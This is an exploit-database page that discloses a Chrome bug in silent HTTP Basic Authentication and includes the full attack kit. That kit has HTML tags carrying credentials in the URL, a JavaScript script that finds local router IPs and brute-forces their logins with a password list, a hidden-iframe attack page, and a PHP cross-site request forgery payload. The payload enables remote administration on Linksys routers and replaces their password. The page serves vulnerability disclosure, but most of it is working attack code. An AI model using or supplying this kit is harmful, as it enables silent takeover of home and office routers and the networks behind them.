0day.today - La plus grande base de données de Exploit dans le monde.
![](/img/logo_green.jpg)
Nous utilisons un domaine DOMAIN_LINK
Si vous voulez acheter un exploit ou payer un service vous avez besoins d'Or. Nous ne voulons pas que notre site soit utiliser comme outil de piratage , de sorte que touts types d'actions qui pourrais affecter illegalement d'autres utilisateurs ou sites web ou vous n'avez pas l'autorisation vous serez bannit et votre compte ainsi que vos donnees seront supprimees.
Les administrateur de 0day.today utilises des moyens de contacts officiels. Mefiez-vous des imposteurs!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Lire le [ J'accepte ]
- Lire le [ Envoyer ] Regles
- Visiter le [ faq ] page
- [ Enregistrement ] profil
- Obtenir [ GOLD ]
- Si vous voulez [ vendre ]
- Si vous voulez [ acheter ]
- Si vous vous perdez [ Compte ]
- Une questions [ [email protected] ]
- Connexion
- Page d'enregistrement
- Restauration de compte
- Foire aux questions
- Contactez-nous
- Regle de publication
- Page de contrat
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Vous pouvez nous contacter par:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Google Chrome Silent HTTP Authentication
Auteur
Risque
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Catégorie
Date d'ajout
Plateforme
VULNERABILITY DETAILS The latest version of Google Chrome (Tested on Version 24.0.1312.57) fails to properly recognize HTTP Basic Authentication when injected in various HTML tags. As a result of this behavior Chrome will not alert the user when HTTP Basic Authentication is taking place or when credentials are rejected. This behavior is particularly concerning with respect to small office and home routers. Such devices are easily brute forced using this method. Many of these devices have the default password enabled which brings me to part II of this bug. Silent HTTP Authentication allows the attacker to log into the router and change settings with no alerts and or warnings issued by Chrome. The end result allows an attacker to brute force the router login, connect to the router, enable remote administration and of course control all information on the entire network via DNS attacks etc. REPRODUCTION CASE I have attached the following files: ======================================= sploit.txt - Indicates the buggy code. Bug 1 - (Stylesheet Method) <link rel="stylesheet" href="http://admin:[email protected]/" type="text/css" /> Bug 2 - (IMG Method) <img src="http://admin:[email protected]" /> Bug 3 - (iFrame Method) var iframe = document.getElementById("loginFrame"); iframe.src = "http://admin:[email protected]"; ======================================= jquery.js - Used for real world scenario but not needed for bug. jQuery v1.7.1 jquery.com ======================================= brute.js - Real world attack scenario for this bug. //Settings victim = "192.168.1.1"; user = "admin"; //Dont touch these count = 1; enabled = false; payload = false; passFound = 0; //Password Array pass = new Array("","admin","password","1234","netgear1","netgear","optimum","password","test","linksys","tech","123456","123456","password","123456789","welcome","ninja","abc123","qwerty","12345678","princess","sunshine","iloveyou","welcome","jesus","babygirl","12345","rockyou","Nichole","Daniel","money","monkey","freedom","654321","michael","1234567","love","master","ginger","11111","1234","dragon","batman","baseball","buster","starwars","dallas","summer","access","killer","mustang","2000","soccer","ranger","696969","tigger","pass","shadow","Jennifer","letmein","Joshua","merlin","Robert","hockey","666666","orange","jordan","trustno1","superman","computer","123123","thunder","internet","lifehack","0","gizmodo","whatever","cheese","nintendo","f You","blahblah","passwOrd","gawker","Password","pokemon","michelle","pepper","kotaku","F#ck","P#ssy","6969","1111","a##hole","golfer","austin","biteme","cowboy","silver","F#cker","bigdog","bl#wjob","yellow","131313","hello","please","scooter","dick","iwantu","sexy","panties","hammer","yankees"); var length = pass.length, element = null; function crackPass() { for (var i = 0; i < length; i++) { if(passFound == 0) { password = pass[i]; jQuery('head').append('<link rel="stylesheet" onload="logPW(\'' + password + '\')" href="http://admin:' + password + '@' + victim + '" type="text/css" />'); } } } function logPW(password) { if(passFound == 0) { alert("Your Router Passowrd is: " + password); //Log Into Router var iframe = document.getElementById("loginFrame"); setTimeout(function() { iframe.src = "http://" + user + ":" + password + "@" + victim; }, 500); setTimeout(function() { window.location = "http://" + victim; }, 2000); } passFound = 1; } //Deploy Malicous Payload to Router (Enable Remote Administration) function dropLoad(){ var iframe = document.getElementById("loginFrame"); setTimeout(function() { iframe.src = "attack.php?ip=" + victim; }, 100); console.log("dropping payload"); } //Enumeration Module Used to Discover Router Local IP Address iplist = new Array("192.168.1.1","10.0.1.1","10.0.0.1","192.168.1.220","192.168.2.1","10.1.1.1","192.168.11.1","192.168.0.1","192.168.0.30","192.168.0.50","192.168.1.30","192.168.1.50","192.168.10.1","192.168.20.1","192.168.30.1","192.168.62.1","192.168.100.1","192.168.102.1","192.168.1.254","192.168.0.227","10.0.0.138","192.168.123.254","192.168.4.1","10.0.0.2"); counter = 0; function enumerateRouter() { if(counter !== iplist.length){ var ip = iplist[counter]; counter++; } else { return false; } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { //alert("success"); } }; xhr.open("POST", "http://" + ip, true); xhr.setRequestHeader("Content-type", "application/json; charset=utf-8"); xhr.timeout = 1000; xhr.ontimeout = function () { console.log(ip + " FAIL"); enumerateRouter(); } xhr.onerror = function () { console.log(ip + " MATCH"); victim = ip; crackPass(); } xhr.send(); } ======================================= index.html - HTML Attack Page <!DOCTYPE html> <html> <head> <script type='text/javascript' src='jquery.js?ver=1.7.1'></script> <script type='text/javascript' src='brute.js'></script> </head> <body onload="enumerateRouter()"> <iframe name="loginFrame" id="loginFrame" src="about:blank" style="display:none;"></iframe> </body> </html> ======================================= attack.php - Payload file for Linksys Routers. <? //collect some info $ip = $_GET["ip"]; $wan = $_SERVER['REMOTE_ADDR']; ?> <html> <head> </head> <body onload="sendPayload()"> <FORM id=password name=password action="http://<? echo $ip; ?>/manage.tri" method=post> <input type=hidden name=remote_mgt_https value=0> <input type=hidden name=http_enable value=1> <input type=hidden name=https_enable value=0> <input type=hidden name=PasswdModify value=0> <input type=hidden name=http_passwd value=d6nw5v1x2pc7st9m> <input type=hidden name=http_passwdConfirm value=d6nw5v1x2pc7st9m> <input type=hidden name=_http_enable value=1> <input type=hidden name=web_wl_filter value=1> <input type=hidden name=remote_management value=1> <input type=hidden name=http_wanport value=5555> <input type=hidden name=upnp_enable value=1> <input type=hidden name=layout value=en> <input type="submit" value="submit"> </FORM> <script> function sendPayload(){ document.password.submit(); } </script> </body> </html> # 0day.today [2024-07-15] #